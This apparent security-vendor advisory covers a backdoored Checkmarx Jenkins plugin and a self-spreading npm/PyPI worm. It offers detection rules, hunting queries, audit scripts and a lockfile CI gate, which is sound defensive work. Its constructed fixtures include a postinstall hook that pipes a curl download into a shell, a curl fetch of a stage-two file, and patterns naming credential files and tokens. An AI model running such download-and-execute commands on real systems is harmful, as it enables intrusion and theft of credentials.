
TeamPCP Supply Chain Campaign: Checkmarx Jenkins Plugin & Mini Shai-Hulud Worm

Security Arsenal Team
May 19, 2026

Introduction

The TeamPCP threat actor has significantly escalated its supply chain operations, marking its most aggressive period since the Trivy disclosure in March. This campaign represents a critical pivot to high-value build infrastructure and developer ecosystems. Security Arsenal has tracked active confirmations of a compromised Checkmarx plugin for Jenkins, alongside the emergence of "Mini Shai-Hulud"—a self-spreading worm actively propagating through the npm and PyPI registries.

For defenders, this is not a theoretical risk. The compromise of CI/CD tools like Jenkins allows for immediate injection of malicious code into software artifacts, affecting downstream customers and production environments. The parallel use of package registry worms demonstrates a multi-vector approach designed to infiltrate development environments from multiple angles. Immediate action is required to identify compromised instances and halt the spread of the worm.

Technical Analysis

Affected Platforms & Products:

  • Jenkins: Checkmarx Plugin (the affected plugin versions are listed in the vendor advisory; see Remediation).
  • Package Managers: npm (Node.js) and PyPI (Python).
  • Malware: Mini Shai-Hulud (Self-spreading worm).

Attack Chain & Mechanics: The TeamPCP campaign follows a classic supply chain attack model with an automated propagation component:

  1. Jenkins Vector: The attacker compromised a specific version of the Checkmarx plugin. In Jenkins, plugins run with the privileges of the Jenkins controller process. The malicious plugin includes a backdoor that allows remote code execution (RCE), enabling the attacker to hijack the CI/CD pipeline, steal credentials, and move laterally within the build infrastructure.
  2. Developer Vector (Mini Shai-Hulud): The worm targets npm and PyPI, arriving either as a typosquatted package or as a trojanized release of a legitimate one. When a developer or build script runs npm install or pip install, the malicious package executes an install-time hook (an npm preinstall/postinstall script, or setup.py/build code for pip). That hook downloads the next stage of Mini Shai-Hulud, which spreads itself by writing into other package directories the current user can modify and exfiltrates data to C2 servers.
  3. Persistence: By infecting the build tools (Jenkins) and the dependencies (npm/PyPI), the attacker ensures persistence across the software development lifecycle (SDLC).
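The install-time hook in step 2 is the one place the worm must be visible on disk: an installed package that wants to run code at install time has to declare it in the scripts block of its package.json. The scanner below walks a directory tree, reads every package.json, and reports lifecycle hooks that look like a download-and-execute stage. It is an added example written for this page, not Security Arsenal or TeamPCP code; the patterns are generic dropper heuristics, not published Mini Shai-Hulud indicators, and the two packages it builds in a temporary directory (native-addon, example-dropper) are constructed fixtures.

```python
"""Scan a dependency tree for npm lifecycle scripts that behave like a dropper.

Added example for this page (not vendor or threat-actor code). Patterns are generic
heuristics; the fixture packages are constructed and the URL uses example.invalid.
"""
import json
import os
import re
import tempfile
from pathlib import Path
from typing import List

# npm runs these automatically on `npm install`; 'prepare' also runs on a bare install of a git dep
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristics for a download-and-execute stage (assumed patterns, not worm IoCs)
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|node|python)"), "download piped to interpreter"),
    (re.compile(r"https?://"), "hardcoded URL in install hook"),
    (re.compile(r"\bnode\s+-e\b"), "inline node -e"),
    (re.compile(r"base64\s+(-d|--decode)|Buffer\.from\([^)]*base64"), "base64 decoding"),
    (re.compile(r"\beval\s*\("), "eval()"),
    (re.compile(r"\.npmrc|NPM_TOKEN|\.pypirc|PYPI_TOKEN|AWS_SECRET"), "credential file/env access"),
]


def inspect_manifest(manifest_path: Path) -> List[dict]:
    """Return one finding per suspicious lifecycle hook declared in a package.json."""
    try:
        data = json.loads(manifest_path.read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return []  # unreadable or not JSON: nothing to report
    scripts = data.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        reasons = [label for pattern, label in SUSPICIOUS if pattern.search(cmd)]
        if reasons:
            findings.append({
                "package": data.get("name", "<unnamed>"),
                "version": data.get("version", "?"),
                "hook": hook,
                "command": cmd,
                "reasons": reasons,
                "path": str(manifest_path),
            })
    return findings


def scan_tree(root: str) -> List[dict]:
    """Inspect every package.json under root (a project dir, a node_modules dir, or a home dir)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" in files:
            findings.extend(inspect_manifest(Path(dirpath) / "package.json"))
    return findings


def build_sample_tree() -> str:
    """Create a throwaway node_modules with one benign and one dropper-like package (constructed)."""
    root = tempfile.mkdtemp(prefix="shscan-")
    node_modules = Path(root) / "node_modules"
    benign = {"name": "native-addon", "version": "1.0.0",
              "scripts": {"postinstall": "node-gyp rebuild"}}
    dropper = {"name": "example-dropper", "version": "9.9.9",  # constructed name, not an IoC
               "scripts": {"postinstall": "curl -fsSL http://example.invalid/stage2.sh | sh"}}
    for pkg in (benign, dropper):
        pkg_dir = node_modules / pkg["name"]
        pkg_dir.mkdir(parents=True)
        (pkg_dir / "package.json").write_text(json.dumps(pkg), encoding="utf-8")
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for finding in scan_tree(sample_root):
        print(f"{finding['package']}@{finding['version']} {finding['hook']}: "
              f"{finding['command']}  <- {', '.join(finding['reasons'])}")
```

Point scan_tree at a developer's home directory or a build agent's workspace root; a native module with a node-gyp rebuild hook produces no finding, while a hook that fetches a URL and pipes it into a shell is reported with every matching reason so an analyst can triage the hit without opening the file.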

Exploitation Status:

  • Confirmed Active Exploitation: Yes. The Checkmarx Jenkins plugin compromise is officially confirmed.
  • Worm Activity: Mini Shai-Hulud is actively spreading across npm and PyPI.

Detection & Response

This activity requires a multi-layered detection approach focusing on CI/CD abuse and suspicious package manager behavior.

Sigma Rules

YAML
---
title: Potential Malicious Jenkins Plugin Execution - Checkmarx TeamPCP
id: 8a1b2c3d-4e5f-6a7b-8c9d-0e1f2a3b4c5d
status: experimental
description: Detects the Jenkins controller JVM spawning a command shell. Plugins execute inside the controller process, so a backdoored plugin that runs commands appears as java.exe (running jenkins.war) spawning cmd.exe or PowerShell. The plugin name is not present in the parent command line, so the rule keys on the Jenkins process itself and must be scoped to controller hosts.
references:
  - https://isc.sans.edu/diary/rss/32994
author: Security Arsenal
date: 2026/05/18
tags:
  - attack.initial_access
  - attack.t1195.002
  - attack.execution
  - attack.t1059.001
  - attack.t1059.003
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith: '\java.exe'
    ParentCommandLine|contains: 'jenkins'
  selection_child:
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\pwsh.exe'
  condition: all of selection_*
falsepositives:
  - Jobs with "Execute Windows batch command" or PowerShell build steps that run on the controller itself (move builds to agents, then baseline)
  - Legitimate plugins that shell out, including Checkmarx scan steps; verify with the Jenkins admin
level: high
---
title: Suspicious Package Manager Post-Install Activity - Mini Shai-Hulud
id: 9b2c3d4e-5f6a-7b8c-9d0e-1f2a3b4c5d6e
status: experimental
description: Detects an npm (node.exe) or pip/python process spawning a download utility, or a shell whose command line carries a URL, the download stage described for the Mini Shai-Hulud worm. Plain shell spawns are excluded because npm runs every lifecycle script through cmd.exe, so a rule on "npm spawns a shell" fires on every install.
references:
  - https://isc.sans.edu/diary/rss/32994
author: Security Arsenal
date: 2026/05/18
tags:
  - attack.execution
  - attack.t1059.006
  - attack.t1059.007
  - attack.command_and_control
  - attack.t1071.001
  - attack.t1105
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\node.exe'
      - '\python.exe'
      - '\pip.exe'
  selection_download_tool:
    Image|endswith:
      - '\curl.exe'
      - '\wget.exe'
      - '\certutil.exe'
      - '\bitsadmin.exe'
  selection_shell_with_url:
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - 'http://'
      - 'https://'
  condition: selection_parent and (selection_download_tool or selection_shell_with_url)
falsepositives:
  - Install hooks that legitimately fetch toolchains or binaries (node-gyp, Electron, Puppeteer, Playwright); allow-list by package after review
level: high
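Both rules depend on getting the process tree right: the first keys on the parent (the controller JVM), while the second has to look past the immediate parent, because on Windows an npm install produces the chain cmd.exe > node.exe (npm-cli.js) > cmd.exe (the lifecycle script) > node.exe > curl.exe. The matcher below implements both rules over constructed process-creation records and walks the ancestor chain for the second one, so a bare shell under npm is left alone while a download tool anywhere under an install is flagged. This is an added example written for this page, not Security Arsenal's detection content; the PIDs, paths and the example.invalid URL are constructed.

```python
"""Process-tree matcher for the two Sigma rules above, run over constructed sample events.

Added example for this page (not Security Arsenal tooling). The records below are
constructed telemetry: PIDs, paths and the example.invalid URL are illustrative only.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str      # full image path as a process_creation event carries it
    cmdline: str


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash"}
DOWNLOADERS = {"curl.exe", "wget.exe", "certutil.exe", "bitsadmin.exe", "curl", "wget"}
JVM = {"java.exe", "java"}
# An ancestor whose command line is a package install (npm-cli.js install, pip install, ...)
INSTALL_RE = re.compile(r"\b(npm|pnpm|yarn|pip3?)\b.*\binstall\b", re.IGNORECASE)


def basename(image: str) -> str:
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestors(proc: Proc, by_pid: Dict[int, Proc]) -> List[Proc]:
    """Walk parent links towards the root; the seen-set guards against PID-reuse loops."""
    chain, seen = [], set()
    parent = by_pid.get(proc.ppid)
    while parent is not None and parent.pid not in seen:
        chain.append(parent)
        seen.add(parent.pid)
        parent = by_pid.get(parent.ppid)
    return chain


def classify(proc: Proc, by_pid: Dict[int, Proc]) -> Optional[str]:
    """Return the name of the matching rule, or None."""
    name = basename(proc.image)
    chain = ancestors(proc, by_pid)
    if not chain:
        return None
    parent = chain[0]
    # Rule 1: the controller JVM (java running jenkins.war) spawning a shell
    if name in SHELLS and basename(parent.image) in JVM and "jenkins" in parent.cmdline.lower():
        return "jenkins_controller_shell"
    # Rule 2: a download tool, or a shell carrying a URL, anywhere under a package install.
    # A bare shell under npm is normal (npm runs each lifecycle script through cmd.exe/sh),
    # so it is deliberately not an alert on its own.
    reaches_out = name in DOWNLOADERS or (name in SHELLS and "http" in proc.cmdline.lower())
    if reaches_out and any(INSTALL_RE.search(a.cmdline) for a in chain):
        return "package_install_download"
    return None


def run_detection(events: List[Proc]) -> Dict[int, str]:
    """Map each alerting PID to the rule it matched."""
    by_pid = {e.pid: e for e in events}
    hits = {}
    for e in events:
        rule = classify(e, by_pid)
        if rule:
            hits[e.pid] = rule
    return hits


# Constructed sample events (not real telemetry)
SAMPLE_EVENTS = [
    Proc(1, 0, r"C:\Program Files\Java\bin\java.exe",
         r'java.exe -jar "C:\Program Files\Jenkins\jenkins.war" --httpPort=8080'),
    Proc(2, 1, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),                       # rule 1 hit
    Proc(10, 0, r"C:\Windows\System32\cmd.exe", "cmd.exe /c npm install"),                 # developer shell
    Proc(11, 10, r"C:\Program Files\nodejs\node.exe",
         r'node.exe "C:\Program Files\nodejs\node_modules\npm\bin\npm-cli.js" install'),
    Proc(12, 11, r"C:\Windows\System32\cmd.exe", "cmd.exe /d /s /c node postinstall.js"),  # normal npm behaviour
    Proc(13, 12, r"C:\Program Files\nodejs\node.exe", "node postinstall.js"),
    Proc(14, 13, r"C:\Windows\System32\curl.exe",
         "curl.exe -s http://example.invalid/stage2 -o C:\\Users\\dev\\AppData\\Local\\Temp\\s2"),  # rule 2 hit
    Proc(15, 11, r"C:\Windows\System32\cmd.exe", "cmd.exe /d /s /c node-gyp rebuild"),     # normal npm behaviour
    Proc(20, 0, "/usr/bin/bash", "bash"),
    Proc(21, 20, "/usr/bin/curl", "curl https://example.invalid/"),                        # no install ancestor
]

if __name__ == "__main__":
    for pid, rule in run_detection(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {rule}")
```

Running it on the sample produces exactly two alerts (PID 2 under the Jenkins JVM and PID 14 under the npm install); the two cmd.exe processes npm itself spawns and the interactive curl with no install ancestor are not reported, which is the behaviour the false-positive notes on the rules describe.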

KQL (Microsoft Sentinel / Defender)

// Hunt for TeamPCP Mini Shai-Hulud worm activity via npm/pip
// Package-manager interpreters (node.exe for npm, python.exe/pip.exe) spawning a download tool,
// or a shell whose command line carries a URL. Plain shell spawns are expected: npm runs every
// lifecycle script through cmd.exe. DeviceProcessEvents exposes the child as FileName.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ ("node.exe", "python.exe", "pip.exe", "node", "python", "python3", "pip", "pip3")
| where FileName in~ ("curl.exe", "wget.exe", "certutil.exe", "bitsadmin.exe", "curl", "wget")
    or (FileName in~ ("cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash")
        and ProcessCommandLine contains "http")
| extend IoC = "Suspicious Package Install Chain"
| project Timestamp, DeviceName, AccountName, IoC, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine

// Hunt for Jenkins controller compromise (backdoored plugin executing commands)
// Plugins run inside the controller JVM, so the parent is java.exe running jenkins.war;
// the plugin name does not appear in the parent command line, so scope this to controller hosts.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ ("java.exe", "java")
| where InitiatingProcessCommandLine contains "jenkins"
| where FileName in~ ("cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash")
| extend IoC = "Jenkins Controller Shell Spawn"
| project Timestamp, DeviceName, AccountName, IoC, FileName, ProcessCommandLine, InitiatingProcessCommandLine

Velociraptor VQL

-- Hunt for Mini Shai-Hulud worm artifacts: installed npm packages that declare lifecycle install hooks.
-- npm runs preinstall/install/postinstall automatically, so every such script body is worth reading.
SELECT OSPath, Mtime, Size,
       parse_json(data=read_file(filename=OSPath)).scripts AS Scripts
FROM glob(globs=['/home/*/**/node_modules/*/package.json',
                 '/home/*/**/node_modules/@*/*/package.json'])
WHERE Mtime.Unix > now() - 7 * 86400
  AND (Scripts.preinstall OR Scripts.install OR Scripts.postinstall)

-- Hunt for Jenkins plugin archive modifications and record hashes for comparison with the vendor's known-good values.
-- The plugin lives in JENKINS_HOME, which differs per install (modern Windows service installs use
-- C:\ProgramData\Jenkins\.jenkins); adjust the globs. Jenkins stores the archive as checkmarx.hpi or .jpi
-- and explodes it into plugins\checkmarx\WEB-INF\lib.
SELECT OSPath, Mtime, Size, hash(path=OSPath).SHA256 AS SHA256
FROM glob(globs=['C:/Program Files/Jenkins/plugins/checkmarx.{hpi,jpi}',
                 'C:/Program Files/Jenkins/plugins/checkmarx/WEB-INF/lib/*.jar'])
WHERE Mtime.Unix > now() - 30 * 86400

-- Linux/macOS: shells or download tools whose parent is a package-manager interpreter.
-- A plain sh under npm is expected (npm runs each lifecycle script through it); review CommandLine for URLs.
SELECT * FROM foreach(
  row={
    SELECT Pid AS ParentPid, Name AS ParentName, CommandLine AS ParentCmd
    FROM pslist() WHERE Name =~ '^(node|npm|python|pip)'
  },
  query={
    SELECT ParentPid, ParentName, ParentCmd, Pid, Name, Exe, CommandLine, Username
    FROM pslist() WHERE Ppid = ParentPid AND Name =~ '^(sh|bash|curl|wget)$'
  })

Remediation Script

PowerShell
# PowerShell: Check Jenkins Checkmarx Plugin Version and Integrity
# Note: Fill $CompromisedVersions and $ExpectedHash from the official vendor advisory; until then the
# script reports version, SHA256 and modification time for manual comparison.
# JENKINS_HOME is not the install directory (modern Windows service installs use
# C:\ProgramData\Jenkins\.jenkins); the service environment variable wins when it is set.

$JenkinsHome         = if ($env:JENKINS_HOME) { $env:JENKINS_HOME } else { "C:\Program Files\Jenkins" }
$PluginDir           = Join-Path $JenkinsHome "plugins"
$PluginName          = "checkmarx"
$CompromisedVersions = @()   # placeholder: affected Plugin-Version strings from the advisory
$ExpectedHash        = ""    # placeholder: SHA256 of the known-good .hpi/.jpi from the advisory

Write-Host "[+] Auditing Jenkins Plugin: $PluginName (JENKINS_HOME=$JenkinsHome)" -ForegroundColor Cyan

# Locate the plugin archive; Jenkins stores it as <name>.hpi or <name>.jpi
$PluginFile = Get-ChildItem -Path $PluginDir -File -ErrorAction SilentlyContinue |
    Where-Object { $_.Name -match ('^' + $PluginName + '\.(hpi|jpi)$') } |
    Select-Object -First 1

if (-not $PluginFile) {
    Write-Host "[INFO] Checkmarx plugin not found on this host." -ForegroundColor Gray
    return
}

Write-Host "[!] Found Plugin: $($PluginFile.FullName)" -ForegroundColor Yellow
Write-Host "    Modified: $($PluginFile.LastWriteTime)"

# The archive is a zip; Plugin-Version lives in META-INF/MANIFEST.MF
Add-Type -AssemblyName System.IO.Compression.FileSystem
$Version = "unknown"
$Zip = [System.IO.Compression.ZipFile]::OpenRead($PluginFile.FullName)
try {
    $Entry = $Zip.GetEntry("META-INF/MANIFEST.MF")
    if ($Entry) {
        $Reader = New-Object System.IO.StreamReader($Entry.Open())
        $Line = ($Reader.ReadToEnd() -split "`r?`n") | Where-Object { $_ -like "Plugin-Version:*" } | Select-Object -First 1
        $Reader.Dispose()
        if ($Line) { $Version = ($Line -replace '^Plugin-Version:\s*', '').Trim() }
    }
} finally { $Zip.Dispose() }

$Hash = (Get-FileHash -Path $PluginFile.FullName -Algorithm SHA256).Hash
Write-Host "    Plugin-Version: $Version"
Write-Host "    SHA256: $Hash"

# Verdict: a hash match against the advisory beats everything; otherwise check the version list;
# otherwise hand the values to the analyst. Modification time alone is not evidence: every update rewrites the file.
if ($ExpectedHash -and ($Hash -ieq $ExpectedHash)) {
    Write-Host "[OK] Archive hash matches the vendor known-good value." -ForegroundColor Green
} elseif ($CompromisedVersions -contains $Version) {
    Write-Host "[CRITICAL] Installed version $Version is listed as compromised." -ForegroundColor Red
    Write-Host "[ACTION] Disable the plugin now (Manage Jenkins > Plugins), reinstall from the official Update Center, then rotate credentials."
} else {
    Write-Host "[INFO] Compare the version and hash above against the advisory before clearing this host." -ForegroundColor Yellow
}
Bash / Shell
#!/bin/bash
# Bash: Hunt for Mini Shai-Hulud worm indicators in Node/Python environments
# Run as root to cover every home directory; add build-agent workspaces to SEARCH_ROOTS.
SEARCH_ROOTS=("/home" "/root" "/var/lib/jenkins")

echo "[*] Installed npm packages with lifecycle install hooks (review each script body)..."
# npm runs preinstall/install/postinstall automatically; that hook is the worm's execution point
for root in "${SEARCH_ROOTS[@]}"; do
  [ -d "$root" ] || continue
  find "$root" -path '*/node_modules/*' -name package.json -mtime -7 \
    -exec grep -lE '"(preinstall|install|postinstall)"[[:space:]]*:' {} + 2>/dev/null
done | head -50

echo "[*] Recent pip install activity from shell history..."
cat ~/.bash_history /home/*/.bash_history 2>/dev/null | grep -E "pip3? install" | tail -10

echo "[*] Checking for known malicious package names (Mini Shai-Hulud indicators)"
# Example placeholders only: replace with the package names published in the SANS ISC diary / vendor advisory
MALICIOUS_PKGS=("malicious-pkg-example" "shai-hulud-worm")
for pkg in "${MALICIOUS_PKGS[@]}"; do
  # global npm installs (npm ls prints name@version per line)
  if npm ls -g --depth=0 2>/dev/null | grep -q -- "$pkg@"; then
    echo "[ALERT] Suspicious global npm package found: $pkg"
  fi
  # per-project npm installs under each search root
  for root in "${SEARCH_ROOTS[@]}"; do
    find "$root" -type d -path "*/node_modules/$pkg" 2>/dev/null | sed 's/^/[ALERT] Suspicious project npm package: /'
  done
  # pip: 'pip show' exits non-zero when the package is not installed
  if python3 -m pip show "$pkg" >/dev/null 2>&1; then
    echo "[ALERT] Suspicious pip package found: $pkg"
  fi
done

Remediation

  1. Jenkins Checkmarx Plugin:

    • Immediate Action: Disable the Checkmarx plugin immediately via the Jenkins Manage Plugins interface to halt any active command and control (C2) or data exfiltration.
    • Patch: Navigate to the Plugin Manager and update to the latest version. Ensure the update is sourced directly from the official Jenkins Update Center or Checkmarx distribution.
    • Credential Rotation: Treat the Jenkins controller and any build agents as compromised. Rotate all credentials (API keys, cloud provider keys, repository tokens) stored in Jenkins or accessible by build jobs.
  2. npm / PyPI (Mini Shai-Hulud):

    • Developer Workstations: Inventory what is actually installed (npm ls --all, pip list) and compare it against the published package names. npm audit only reports packages that already carry a published advisory, and pip check only verifies dependency metadata consistency; neither finds a package that is not yet in an advisory database, so run them but do not treat a clean result as clearance. Remove node_modules and reinstall from the reviewed lockfile with npm ci --ignore-scripts; do not delete package-lock.json first, because a fresh resolve can pull the trojanized versions while they remain on the registry.
    • Supply Chain Hygiene: Commit lockfiles (package-lock.json, or requirements pinned with --hash and installed with pip install --require-hashes) and review their diffs in CI. Build with npm ci, which refuses to install when package.json and the lockfile disagree, and fail the build when the lockfile changes in a change that does not touch package.json. Set ignore-scripts=true in the CI .npmrc so lifecycle hooks cannot run at install time.
  3. Vendor Advisory:

    • Refer to the official Checkmarx Security Advisory for the specific CVEs (e.g., CVE-2025-XXXXX) and safe versions associated with this campaign.
    • Monitor the SANS ISC Diary for updates on the malicious package names used in the Mini Shai-Hulud worm.
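The lockfile checks in the npm / PyPI remediation above are mechanical enough to run as a CI gate. The script below parses a package-lock.json (lockfileVersion 2 or 3), flags entries that resolve outside the allowed registries, lack an integrity hash, or carry a denylisted name, and reports drift (packages added, removed, or re-pinned) against a baseline lockfile, which in CI is the lockfile at the merge-base. It is an added example written for this page, not Security Arsenal tooling; the two lockfiles are constructed, the sha512 values are placeholders, and example-worm is a stand-in for a denylisted name, not a published Mini Shai-Hulud indicator.

```python
"""CI gate over package-lock.json: registry provenance, integrity hashes, denylist and drift.

Added example for this page (not Security Arsenal tooling). The two lockfiles are
constructed; sha512 values are placeholders and example-worm is a stand-in name.
"""
from typing import Dict, FrozenSet, List
from urllib.parse import urlparse

ALLOWED_REGISTRY_HOSTS = {"registry.npmjs.org"}   # assumption: add your internal mirror here


def lock_packages(lock: dict) -> Dict[str, dict]:
    """Entries of a lockfileVersion 2/3 'packages' map, minus the root project (key '')."""
    return {path: entry for path, entry in (lock.get("packages") or {}).items() if path}


def package_name(path: str, entry: dict) -> str:
    # v3 omits 'name' unless it differs from the path; '@scope/pkg' keeps its scope this way
    return entry.get("name") or path.rsplit("node_modules/", 1)[-1]


def audit_lockfile(lock: dict, denylist: FrozenSet[str] = frozenset()) -> List[dict]:
    """Flag entries that a worm-published or hand-edited lockfile would show."""
    findings = []
    for path, entry in lock_packages(lock).items():
        if entry.get("link") or entry.get("inBundle"):
            continue  # workspace links and bundled deps legitimately have no resolved/integrity
        name = package_name(path, entry)
        version = entry.get("version")
        if name in denylist:
            findings.append({"package": name, "version": version, "reason": "name on denylist"})
        resolved = entry.get("resolved")
        if not resolved:
            findings.append({"package": name, "version": version, "reason": "no resolved URL"})
        elif urlparse(resolved).hostname not in ALLOWED_REGISTRY_HOSTS:
            findings.append({"package": name, "version": version,
                             "reason": "resolved outside allowed registries"})
        if not entry.get("integrity"):
            findings.append({"package": name, "version": version, "reason": "missing integrity hash"})
    return findings


def lockfile_drift(baseline: dict, candidate: dict) -> Dict[str, List[str]]:
    """Packages added, removed, or re-pinned (version or integrity changed) relative to the baseline."""
    b, c = lock_packages(baseline), lock_packages(candidate)

    def pin(entry: dict):
        return entry.get("version"), entry.get("integrity")

    return {
        "added": sorted(set(c) - set(b)),
        "removed": sorted(set(b) - set(c)),
        "changed": sorted(p for p in set(b) & set(c) if pin(b[p]) != pin(c[p])),
    }


def gate(baseline: dict, candidate: dict, denylist: FrozenSet[str] = frozenset(),
         allow_drift: bool = False) -> bool:
    """True if the build may proceed. allow_drift is set only for changes that also touch package.json."""
    if audit_lockfile(candidate, denylist):
        return False
    return allow_drift or not any(lockfile_drift(baseline, candidate).values())


# Constructed lockfiles (placeholder integrity values; 203.0.113.7 is a documentation address)
BASELINE_LOCK = {
    "name": "app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "app", "version": "1.0.0"},
        "node_modules/left": {"version": "1.0.0",
                              "resolved": "https://registry.npmjs.org/left/-/left-1.0.0.tgz",
                              "integrity": "sha512-AAAA"},
        "node_modules/right": {"version": "2.1.0",
                               "resolved": "https://registry.npmjs.org/right/-/right-2.1.0.tgz",
                               "integrity": "sha512-BBBB"},
    },
}
CANDIDATE_LOCK = {
    "name": "app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "app", "version": "1.0.0"},
        # re-pinned to a non-registry host with no integrity hash
        "node_modules/left": {"version": "1.0.1", "resolved": "http://203.0.113.7/left-1.0.1.tgz"},
        "node_modules/right": BASELINE_LOCK["packages"]["node_modules/right"],
        # a new dependency whose name is on the denylist
        "node_modules/example-worm": {"version": "0.0.1",
                                      "resolved": "https://registry.npmjs.org/example-worm/-/example-worm-0.0.1.tgz",
                                      "integrity": "sha512-CCCC"},
    },
}

if __name__ == "__main__":
    deny = frozenset({"example-worm"})
    for f in audit_lockfile(CANDIDATE_LOCK, deny):
        print(f"{f['package']}@{f['version']}: {f['reason']}")
    print("drift:", lockfile_drift(BASELINE_LOCK, CANDIDATE_LOCK))
    print("build allowed:", gate(BASELINE_LOCK, CANDIDATE_LOCK, deny))
```

In a pipeline, load the baseline from git show origin/main:package-lock.json and the candidate from the checkout, pass the current IoC names as the denylist, and fail the job when gate returns False; the findings list tells the reviewer which entry to look at rather than just that the lockfile differs.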
